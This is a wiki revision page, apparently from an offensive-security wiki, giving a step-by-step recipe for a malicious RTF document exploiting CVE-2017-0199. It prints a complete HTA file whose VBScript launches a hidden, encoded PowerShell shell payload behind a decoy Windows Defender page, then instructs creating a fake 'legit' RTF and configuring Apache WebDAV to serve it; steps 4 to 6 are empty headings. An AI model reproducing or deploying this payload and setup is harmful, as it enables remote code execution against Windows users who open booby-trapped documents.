CVE-2017-0199 Malicious RTF Document: Difference between revisions
From ICO wiki
Jump to navigationJump to search
Line 38: | Line 38: | ||
===Step 3 === | ===Step 3 === | ||
Push these 2 files on a webserver you have full control on. | |||
We supposed it will be stored in /var/www/html | |||
Now we have to configure Apache to be able to include the ms.rtf as a link | |||
<pre> | |||
a2enmod dav | |||
a2enmod dav_fs | |||
a2enmod dav_lock | |||
a2enmod headers | |||
service apache2 restart | |||
</pre> | |||
===Step 4 === | ===Step 4 === | ||
===Step 5 === | ===Step 5 === | ||
===Step 6 === | ===Step 6 === |
Revision as of 20:33, 2 May 2017
CVE-2017-0199 Malicious RTF Document
Step 1
Prepare an HTA file: (HTA file are HTML application which can run JScript and VBscript) Let's call it "ms.hta"
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta content="text/html; charset=utf-8" http-equiv="Content-Type" /> <title>Bonjour</title> <script language="VBScript"> Set owFrClN0giJ = CreateObject("Wscript.Shell") Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject") If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then owFrClN0giJ.Run "powershell.exe -nop -w hidden -e ENCODED_B64_SHELL" End If </script> <hta:application id="oHTA" applicationname="Bonjour" application="yes" > </hta:application> </head> <div> <object type="text/html" data="http://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%"> </object></div> <body> </body> </html>
Step 2
Create a simple RTF document using Winword with the any random content. (in our example the string "This is my official and legit content")
Call it "ms.rtf"
Step 3
Push these 2 files on a webserver you have full control on. We supposed it will be stored in /var/www/html
Now we have to configure Apache to be able to include the ms.rtf as a link
a2enmod dav a2enmod dav_fs a2enmod dav_lock a2enmod headers service apache2 restart